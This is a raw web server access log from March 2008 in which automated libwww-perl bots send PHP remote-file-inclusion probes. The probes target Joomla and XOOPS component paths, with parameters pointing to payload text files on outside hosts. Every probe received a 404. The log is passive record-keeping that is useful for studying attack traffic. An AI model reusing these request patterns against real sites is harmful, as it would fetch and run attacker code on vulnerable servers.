213.193.223.44 - - [23/Mar/2008:05:04:19 -0700] "GET //PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.freewebtown.com/perocs/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.dmulk.com"
62.44.73.116 - - [23/Mar/2008:05:04:21 -0700] "GET /logs/access_080119.log//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.44.73.116 - - [23/Mar/2008:05:04:21 -0700] "GET //modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.44.73.116 - - [23/Mar/2008:05:04:22 -0700] "GET /logs//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.195.11.193 - - [23/Mar/2008:05:04:27 -0700] "GET /logs/access_080218.log//modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
200.195.11.193 - - [23/Mar/2008:05:04:28 -0700] "GET //modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
200.195.11.193 - - [23/Mar/2008:05:04:28 -0700] "GET /logs//modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
213.193.246.175 - - [23/Mar/2008:05:04:34 -0700] "GET //PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.sdmetal.org/prod//modules/SPChat/images/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
122.201.81.6 - - [23/Mar/2008:05:04:35 -0700] "GET /logs/access_080117.log/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
122.201.81.6 - - [23/Mar/2008:05:04:37 -0700] "GET /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
122.201.81.6 - - [23/Mar/2008:05:04:38 -0700] "GET /logs/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
122.201.81.6 - - [23/Mar/2008:05:04:43 -0700] "GET /logs/access_080211.log/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
65.98.59.114 - - [23/Mar/2008:05:04:46 -0700] "GET //modules/xfsection/modify.php?dir_module=http://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
62.44.73.116 - - [23/Mar/2008:05:04:57 -0700] "GET //modules/xfsection/modify.php?dir_module=http://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
213.92.85.176 - - [23/Mar/2008:05:05:10 -0700] "GET /logs/access_080213.log/components/com_performs/performs.php?mosConfig_absolute_path=http://www.compassoc.com/themes/ca/images/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
160.99.12.231 - - [23/Mar/2008:05:05:14 -0700] "GET /logs/access_080220.log/components/com_performs/performs.php?mosConfig_absolute_path=http://www.cyberzane.net/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
160.99.12.231 - - [23/Mar/2008:05:05:15 -0700] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://www.cyberzane.net/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
160.99.12.231 - - [23/Mar/2008:05:05:15 -0700] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://www.cyberzane.net/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
122.201.81.6 - - [23/Mar/2008:05:05:20 -0700] "GET /logs/access_080211.log/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
62.44.73.116 - - [23/Mar/2008:05:05:21 -0700] "GET //modules/horoscope/footer.php?xoopsConfig[root_path]=http://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
204.213.247.235 - - [23/Mar/2008:05:05:24 -0700] "GET /logs/access_080201.log//mvcw_conver.php?step=http://gimpindustries.net/ca/images/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
204.213.247.235 - - [23/Mar/2008:05:05:24 -0700] "GET //mvcw_conver.php?step=http://gimpindustries.net/ca/images/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
122.201.81.6 - - [23/Mar/2008:05:05:24 -0700] "GET /logs/access_080211.log/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
204.213.247.235 - - [23/Mar/2008:05:05:24 -0700] "GET /logs//mvcw_conver.php?step=http://gimpindustries.net/ca/images/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
80.86.167.140 - - [23/Mar/2008:05:05:25 -0700] "GET //modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
200.195.11.193 - - [23/Mar/2008:05:05:25 -0700] "GET /logs/access_080119.log//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
200.195.11.193 - - [23/Mar/2008:05:05:26 -0700] "GET //modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
200.195.11.193 - - [23/Mar/2008:05:05:26 -0700] "GET /logs//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
62.44.73.116 - - [23/Mar/2008:05:05:26 -0700] "GET /logs/access_080124.log//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.24.50.200 - - [23/Mar/2008:05:05:30 -0700] "GET /logs/access_080131.log/skins/advanced/advanced1.php?pluginpath[0]=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.dmulk.com"
217.24.50.200 - - [23/Mar/2008:05:05:31 -0700] "GET /logs/skins/advanced/advanced1.php?pluginpath[0]=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.dmulk.com"
74.6.18.30 - - [23/Mar/2008:05:05:32 -0700] "GET /logs/access_071130.log HTTP/1.0" 304 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
122.201.81.6 - - [23/Mar/2008:05:05:32 -0700] "GET /logs/access_080124.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
85.214.73.168 - - [23/Mar/2008:05:05:32 -0700] "GET //modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
84.243.253.159 - - [23/Mar/2008:05:05:32 -0700] "GET /logs/access_080131.log/skins/advanced/advanced1.php?pluginpath[0]=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
84.243.253.159 - - [23/Mar/2008:05:05:33 -0700] "GET /logs/access_080131.log/skins/advanced/advanced1.php?pluginpath[0]=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
84.243.253.159 - - [23/Mar/2008:05:05:33 -0700] "GET /logs/skins/advanced/advanced1.php?pluginpath[0]=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
84.243.253.159 - - [23/Mar/2008:05:05:33 -0700] "GET /logs/skins/advanced/advanced1.php?pluginpath[0]=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
122.201.81.6 - - [23/Mar/2008:05:05:34 -0700] "GET /logs/access_080211.log/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
122.201.81.6 - - [23/Mar/2008:05:05:36 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
63.246.151.78 - - [23/Mar/2008:05:05:40 -0700] "GET //modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
122.201.81.6 - - [23/Mar/2008:05:05:40 -0700] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
122.201.81.6 - - [23/Mar/2008:05:05:43 -0700] "GET /logs/access_080211.log/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
65.98.59.114 - - [23/Mar/2008:05:05:45 -0700] "GET /logs/access_080131.log//modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
63.246.151.78 - - [23/Mar/2008:05:05:46 -0700] "GET /logs/access_080126.log//modules/xfsection/modify.php?dir_module=http://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
200.195.11.193 - - [23/Mar/2008:05:05:46 -0700] "GET /logs/access_080124.log//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
213.92.85.176 - - [23/Mar/2008:05:05:50 -0700] "GET /logs/access_080131.log/components/com_performs/performs.php?mosConfig_absolute_path=http://www.compassoc.com/themes/ca/images/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
122.201.81.6 - - [23/Mar/2008:05:05:52 -0700] "GET /logs/access_080117.log/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
122.201.81.6 - - [23/Mar/2008:05:05:56 -0700] "GET /logs/access_080211.log/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
122.201.81.6 - - [23/Mar/2008:05:05:58 -0700] "GET /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
87.230.15.10 - - [23/Mar/2008:05:06:01 -0700] "GET /logs/access_080210.log/skins/advanced/advanced1.php?pluginpath[0]=ftp://84.32.137.157/incoming/upload/trem/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
63.246.151.78 - - [23/Mar/2008:05:06:01 -0700] "GET /logs/access_080313.log//modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
122.201.81.6 - - [23/Mar/2008:05:06:02 -0700] "GET /logs/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
63.246.151.78 - - [23/Mar/2008:05:06:02 -0700] "GET //modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
63.246.151.78 - - [23/Mar/2008:05:06:02 -0700] "GET /logs//modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
160.99.12.231 - - [23/Mar/2008:05:06:02 -0700] "GET /logs/access_080120.log/components/com_performs/performs.php?mosConfig_absolute_path=http://www.cyberzane.net/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
122.201.81.6 - - [23/Mar/2008:05:06:06 -0700] "GET /logs/access_080124.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
122.201.81.6 - - [23/Mar/2008:05:06:07 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
122.201.81.6 - - [23/Mar/2008:05:06:08 -0700] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
122.201.81.6 - - [23/Mar/2008:05:06:10 -0700] "GET /logs/access_080211.log/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
122.201.81.6 - - [23/Mar/2008:05:06:18 -0700] "GET /logs/access_080124.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
122.201.81.6 - - [23/Mar/2008:05:06:20 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
122.201.81.6 - - [23/Mar/2008:05:06:21 -0700] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
65.98.59.114 - - [23/Mar/2008:05:06:21 -0700] "GET /logs/access_080313.log//modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
65.98.59.114 - - [23/Mar/2008:05:06:22 -0700] "GET //modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
65.98.59.114 - - [23/Mar/2008:05:06:22 -0700] "GET /logs//modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
200.195.11.193 - - [23/Mar/2008:05:06:28 -0700] "GET /logs/access_080204.log//modules/xfsection/modify.php?dir_module=http://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
200.195.11.193 - - [23/Mar/2008:05:06:28 -0700] "GET //modules/xfsection/modify.php?dir_module=http://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
62.44.73.116 - - [23/Mar/2008:05:06:29 -0700] "GET /logs/access_080131.log//modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.195.11.193 - - [23/Mar/2008:05:06:29 -0700] "GET /logs//modules/xfsection/modify.php?dir_module=http://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
62.44.73.116 - - [23/Mar/2008:05:06:29 -0700] "GET //modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.44.73.116 - - [23/Mar/2008:05:06:29 -0700] "GET /logs//modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.44.73.116 - - [23/Mar/2008:05:06:34 -0700] "GET //modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.214.73.168 - - [23/Mar/2008:05:06:37 -0700] "GET /logs/access_080313.log//modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.214.73.168 - - [23/Mar/2008:05:06:38 -0700] "GET //modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
65.98.59.114 - - [23/Mar/2008:05:06:38 -0700] "GET //modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
85.214.73.168 - - [23/Mar/2008:05:06:38 -0700] "GET /logs//modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
122.201.81.6 - - [23/Mar/2008:05:06:40 -0700] "GET /logs/access_080124.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
122.201.81.6 - - [23/Mar/2008:05:06:41 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
85.214.73.168 - - [23/Mar/2008:05:06:45 -0700] "GET /logs/access_080126.log//modules/xfsection/modify.php?dir_module=http://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
122.201.81.6 - - [23/Mar/2008:05:06:46 -0700] "GET /logs/access_080211.log/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
122.201.81.6 - - [23/Mar/2008:05:06:47 -0700] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
122.201.81.6 - - [23/Mar/2008:05:06:53 -0700] "GET /logs/access_080124.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
122.201.81.6 - - [23/Mar/2008:05:06:54 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
122.201.81.6 - - [23/Mar/2008:05:06:54 -0700] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
65.98.59.114 - - [23/Mar/2008:05:06:55 -0700] "GET //modules/horoscope/footer.php?xoopsConfig[root_path]=http://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
200.195.11.193 - - [23/Mar/2008:05:06:58 -0700] "GET //modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
63.246.151.78 - - [23/Mar/2008:05:07:00 -0700] "GET /logs/access_080228.log//modules/horoscope/footer.php?xoopsConfig[root_path]=http://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
63.246.151.78 - - [23/Mar/2008:05:07:00 -0700] "GET //modules/horoscope/footer.php?xoopsConfig[root_path]=http://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
63.246.151.78 - - [23/Mar/2008:05:07:00 -0700] "GET /logs//modules/horoscope/footer.php?xoopsConfig[root_path]=http://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
200.195.11.193 - - [23/Mar/2008:05:07:04 -0700] "GET //modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
69.10.154.114 - - [23/Mar/2008:05:07:07 -0700] "GET /logs/access_080201.log//mvcw_conver.php?step=http://gimpindustries.net/ca/images/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.10.154.114 - - [23/Mar/2008:05:07:07 -0700] "GET /logs/access_080201.log//mvcw_conver.php?step=http://randersnet.dk/themes/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.10.154.114 - - [23/Mar/2008:05:07:07 -0700] "GET /logs/access_080201.log//mvcw_conver.php?step=http://gimpindustries.net/ca/images/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.10.154.114 - - [23/Mar/2008:05:07:07 -0700] "GET //mvcw_conver.php?step=http://randersnet.dk/themes/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.10.154.114 - - [23/Mar/2008:05:07:07 -0700] "GET //mvcw_conver.php?step=http://gimpindustries.net/ca/images/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.10.154.114 - - [23/Mar/2008:05:07:07 -0700] "GET //mvcw_conver.php?step=http://gimpindustries.net/ca/images/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.10.154.114 - - [23/Mar/2008:05:07:07 -0700] "GET /logs//mvcw_conver.php?step=http://randersnet.dk/themes/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.10.154.114 - - [23/Mar/2008:05:07:07 -0700] "GET /logs//mvcw_conver.php?step=http://gimpindustries.net/ca/images/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.10.154.114 - - [23/Mar/2008:05:07:07 -0700] "GET /logs//mvcw_conver.php?step=http://gimpindustries.net/ca/images/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
122.201.81.6 - - [23/Mar/2008:05:07:17 -0700] "GET /logs/access_080124.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
122.201.81.6 - - [23/Mar/2008:05:07:18 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
65.98.59.114 - - [23/Mar/2008:05:07:18 -0700] "GET /logs/access_080126.log//modules/xfsection/modify.php?dir_module=http://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
122.201.81.6 - - [23/Mar/2008:05:07:18 -0700] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
200.195.11.193 - - [23/Mar/2008:05:07:33 -0700] "GET //modules/xfsection/modify.php?dir_module=http://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
122.201.81.6 - - [23/Mar/2008:05:07:38 -0700] "GET /logs/access_080124.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
122.201.81.6 - - [23/Mar/2008:05:07:38 -0700] "GET /logs/access_080124.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
122.201.81.6 - - [23/Mar/2008:05:07:39 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
122.201.81.6 - - [23/Mar/2008:05:07:40 -0700] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
122.201.81.6 - - [23/Mar/2008:05:07:40 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
122.201.81.6 - - [23/Mar/2008:05:07:41 -0700] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
200.195.11.193 - - [23/Mar/2008:05:07:45 -0700] "GET /logs/access_080131.log//modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
